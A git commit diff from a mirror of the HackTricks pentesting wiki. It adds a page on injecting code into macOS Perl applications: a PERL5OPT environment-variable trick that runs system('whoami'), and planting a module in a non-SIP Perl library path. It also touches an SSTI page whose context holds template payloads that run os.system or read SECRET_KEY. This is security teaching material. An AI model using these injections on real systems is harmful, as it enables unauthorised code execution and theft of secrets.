mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-4173: change request with no subject merged in GitBook
This commit is contained in:
parent
9275537ffe
commit
ae3c6e44b7
6 changed files with 109 additions and 4 deletions
BIN
.gitbook/assets/image (720).png
Normal file
BIN
.gitbook/assets/image (720).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 127 KiB |
|
@ -174,9 +174,10 @@
|
|||
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md)
|
||||
* [macOS xpc\_connection\_get\_audit\_token Attack](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc\_connection\_get\_audit\_token-attack.md)
|
||||
* [macOS Thread Injection via Task port](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md)
|
||||
* [macOS Java apps Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md)
|
||||
* [macOS Java Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md)
|
||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
|
||||
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
|
||||
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
|
||||
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
|
||||
|
|
|
@ -72,6 +72,14 @@ It's possible to inject code into .Net applications by **abusing the .Net debugg
|
|||
[macos-.net-applications-injection.md](macos-.net-applications-injection.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Perl Injection
|
||||
|
||||
Check different options to make a Perl script execute arbitrary code in:
|
||||
|
||||
{% content-ref url="macos-perl-applications-injection.md" %}
|
||||
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Python Injection
|
||||
|
||||
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished.
|
||||
|
|
|
@ -0,0 +1,76 @@
|
|||
# macOS Perl Applications Injection
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Via `PERL5OPT` env variable
|
||||
|
||||
Using the env variable PERL5OPT it's possible to make perl execute arbitrary commands.\
|
||||
For example, create this script:
|
||||
|
||||
{% code title="test.pl" %}
|
||||
```perl
|
||||
#!/usr/bin/perl
|
||||
print "Hello from the Perl script!\n";
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
Now **export the env variable** and execute the **perl** script:
|
||||
|
||||
```bash
|
||||
export PERL5OPT='-Mwarnings;system("whoami")'
|
||||
perl test.pl # This will execute "whoami"
|
||||
```
|
||||
|
||||
## Via dependencies
|
||||
|
||||
It's possible to list the dependencies folder order of Perl running:
|
||||
|
||||
```bash
|
||||
perl -e 'print join("\n", @INC)'
|
||||
```
|
||||
|
||||
Which will return something like:
|
||||
|
||||
```bash
|
||||
/Library/Perl/5.30/darwin-thread-multi-2level
|
||||
/Library/Perl/5.30
|
||||
/Network/Library/Perl/5.30/darwin-thread-multi-2level
|
||||
/Network/Library/Perl/5.30
|
||||
/Library/Perl/Updates/5.30.3
|
||||
/System/Library/Perl/5.30/darwin-thread-multi-2level
|
||||
/System/Library/Perl/5.30
|
||||
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
|
||||
/System/Library/Perl/Extras/5.30
|
||||
```
|
||||
|
||||
Some of the returned folders doesn't even exist, however, **`/Library/Perl/5.30`** does **exist**, it's **not** **protected** by **SIP** and it's **before** the folders **protected by SIP**. Therefore, someone could abuse that folder to add script dependencies in there so a high privilege Perl script will load it.
|
||||
|
||||
However, note that you **need to be root to write in that folder**.
|
||||
|
||||
For example, if a script is importing **`use File::Basename;`** it would be possible to create `/Library/Perl/5.30/File/Basename.pm` to make it execute arbitrary code.
|
||||
|
||||
## References
|
||||
|
||||
* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
|
@ -52,6 +52,19 @@ drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
|
|||
|
||||
Here, the **`restricted`** flag indicates that the `/usr/libexec` directory is protected by SIP. In a SIP-protected directory, files cannot be created, modified, or deleted.
|
||||
|
||||
Moreover, if a file contains the attribute **`com.apple.rootless`** extended **attribute**, that file will also be **protected by SIP**.
|
||||
|
||||
**SIP also limits other root actions** like:
|
||||
|
||||
* Loading untrusted kernel extensions
|
||||
* Getting task-ports for Apple-signed processes
|
||||
* Modifying NVRAM variables
|
||||
* Allowing kernel debugging
|
||||
|
||||
Options are maintained in nvram variable as a bitflag (`csr-active-config` on Intel and `lp-sip0` is read from the booted Device Tree for ARM). You can find the flags in the XNU source code in `csr.sh`:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (720).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### SIP Status
|
||||
|
||||
You can check if SIP is enabled on your system with the following command:
|
||||
|
|
|
@ -115,6 +115,7 @@ At this point you should have a **firm idea of the attack surface available** to
|
|||
## Tools
|
||||
|
||||
### [TInjA](https://github.com/Hackmanit/TInjA)
|
||||
|
||||
an efficient SSTI + CSTI scanner which utilizes novel polyglots
|
||||
|
||||
```bash
|
||||
|
@ -130,7 +131,8 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
|
|||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||
```
|
||||
|
||||
### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)
|
||||
### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)
|
||||
|
||||
an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.
|
||||
|
||||
## Exploits
|
||||
|
@ -337,6 +339,7 @@ New version of Pebble :
|
|||
{% endraw %}
|
||||
|
||||
|
||||
|
||||
{% set bytes = (1).TYPE
|
||||
.forName('java.lang.Runtime')
|
||||
.methods[6]
|
||||
|
@ -848,6 +851,7 @@ Check out the following page to learn tricks about **arbitrary command execution
|
|||
|
||||
|
||||
|
||||
|
||||
{{os.system('whoami')}}
|
||||
{{os.system('whoami')}}
|
||||
```
|
||||
|
@ -878,6 +882,7 @@ Check out the following page to learn tricks about **arbitrary command execution
|
|||
|
||||
|
||||
|
||||
|
||||
{{settings.SECRET_KEY}}
|
||||
{{4*4}}[[5*5]]
|
||||
{{7*'7'}} would result in 7777777
|
||||
|
@ -1028,9 +1033,11 @@ If you think it could be useful, read:
|
|||
|
||||
## Tools
|
||||
|
||||
{% embed url="https://github.com/Hackmanit/TInjA" %}
|
||||
{% embed url="https://github.com/Hackmanit/TInjA" %}
|
||||
|
||||
{% embed url="https://github.com/epinna/tplmap" %}
|
||||
{% embed url="https://github.com/Hackmanit/template-injection-table" %}
|
||||
|
||||
{% embed url="https://github.com/Hackmanit/template-injection-table" %}
|
||||
|
||||
## Brute-Force Detection List
|
||||
|
||||
|
|
Loading…
Reference in a new issue